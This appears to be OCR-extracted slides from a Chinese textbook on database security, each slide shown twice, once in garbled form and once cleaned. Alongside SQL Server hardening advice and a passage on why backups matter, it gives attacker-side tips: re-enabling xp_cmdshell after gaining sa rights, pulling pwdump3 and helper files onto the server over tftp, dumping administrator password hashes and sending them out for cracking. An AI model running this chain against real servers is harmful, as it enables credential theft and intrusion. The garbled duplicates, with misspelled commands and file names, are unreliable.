(2)对扩展存储过程进行处理。首先就是 xp cmdshell,还有就是上面那些一大堆存储过程 都删掉,一般也用不着。 执行: use master sp_ dropextendedproc xp cmdshell 去掉 guest帐号,阻止非授权用户访问,同时也去 掉不必要的网络协议。 (3)加强对数据库登陆的日志记录,最好记录所 有登陆事件。 (4)用管理员帐号定期检查所有帐号,是否密码 为空或者过于简单
( 2 ) 对 扩 展 存 储 过 程 进 行 处 理 。 首 先 就 是 xp_cmdshell,还有就是上面那些一大堆存储过程, 都删掉,一般也用不着。 执行: use master sp_dropextendedproc 'xp_cmdshell' 去掉guest帐号,阻止非授权用户访问,同时也去 掉不必要的网络协议。 (3)加强对数据库登陆的日志记录,最好记录所 有登陆事件。 (4)用管理员帐号定期检查所有帐号,是否密码 为空或者过于简单
加强数据库的安全是非常重要的。类似DN MAIL等等,数据库服务器往往成为各种入侵的跳 板。下面是搜集到的一些关于数据库的问题解答 及使用技巧: (1)获得sa权限后,却不能执行 xp cmdshell|储 过程。 可能是已经把 xp cashel等扩展存储过程删除了 可以用这个存储过程把 xp cmdshell恢复 sp addextendedproc xp cmdshell,, xpsql70 dll (2)如何通过数据库用 pwdump获得系统管理员 密码。 先上传一个 pwdump
加强数据库的安全是非常重要的。类似DNS、 MAIL等等,数据库服务器往往成为各种入侵的跳 板。 下面是搜集到的一些关于数据库的问题解答 及使用技巧: (1)获得sa权限后,却不能执行xp_cmdshell存储 过程。 可能是已经把xp_cmdshell等扩展存储过程删除了, 可以用这个存储过程把xp_cmdshell恢复。 sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' (2)如何通过数据库用pwdump获得系统管理员 密码。 先上传一个pwdump
ftp -i get pwdump3 exe pwdump3 exe tftp -1 GET Isaext dll Isaext dll titp -1 Get pwservice exe pwservice exe pwdump3 127.0.0.1 outfile. txt tftp put outfile. txt outfile. txt 然后再用解密工具破解这些密码。 (3)如何从数据库读取系统管理员密码。 能读出加密的密码是NT的管理员 ( administrator)帐号也不能做的。 SQL Server能 读出来是“ LocalSystem”帐号,这个帐号比 administrator更高一级
tftp -i GET pwdump3.exe pwdump3.exe tftp -i GET lsaext.dll lsaext.dll tftp -i GET pwservice.exe pwservice.exe pwdump3 127.0.0.1 outfile.txt tftp PUT outfile.txt outfile.txt 然后再用解密工具破解这些密码。 (3)如何从数据库读取系统管理员密码。 能读出加密的密码是 NT 的管理员 (administrator)帐号也不能做的。SQL Server能 读出来是 “ LocalSystem” 帐 号 , 这个帐号比 administrator更高一级
94数据库的备份 941数据备份的重要性和必要性 在当今信息社会,最珍贵的财产并 不是计算机软件,更不是计算机硬件, 而是企业在长期发展过程中所积累下来 的业务数据。建立网络最根本的用途是 要更加方便地传递与使用数据,但人为 错误、硬盘损坏、电脑病毒、断电或是 天灾人祸等等都有可能造成数据的丢失 所以应该强调指出:“数据是资产,备 份最重要
9.4 数据库的备份 9.4.1 数据备份的重要性和必要性 在当今信息社会,最珍贵的财产并 不是计算机软件,更不是计算机硬件, 而是企业在长期发展过程中所积累下来 的业务数据。建立网络最根本的用途是 要更加方便地传递与使用数据,但人为 错误、硬盘损坏、电脑病毒、断电或是 天灾人祸等等都有可能造成数据的丢失。 所以应该强调指出:“数据是资产,备 份最重要”
应当理解备份意识实际上就是数据的保护意识 在危机四伏的网络环境中,数据随时有被毁灭的 可能。由于我国目前软件盗版现象还没有得到彻 底的解决,而且大部分的盗版软件中都隐藏着致 命的病毒,这就不可避免的对使用这些软件的用 户构成极大的潜在威胁。而且,由于病毒本身所 具有的智能性与可移植性,很可能在一瞬间这些 病毒便会殃极整个网络。尽管现在的杀毒软件层 出不穷,但可以肯定的讲,无论这些软件的功能 如何强大,人们永远也不可能杀尽所有的病毒, 因为病毒的更新速度要永远快于杀毒软件的更新 速度。从这个意议上讲,对数据进行备份是非常 必要的
应当理解备份意识实际上就是数据的保护意识, 在危机四伏的网络环境中,数据随时有被毁灭的 可能。由于我国目前软件盗版现象还没有得到彻 底的解决,而且大部分的盗版软件中都隐藏着致 命的病毒,这就不可避免的对使用这些软件的用 户构成极大的潜在威胁。而且,由于病毒本身所 具有的智能性与可移植性,很可能在一瞬间这些 病毒便会殃极整个网络。尽管现在的杀毒软件层 出不穷,但可以肯定的讲,无论这些软件的功能 如何强大,人们永远也不可能杀尽所有的病毒, 因为病毒的更新速度要永远快于杀毒软件的更新 速度。从这个意议上讲,对数据进行备份是非常 必要的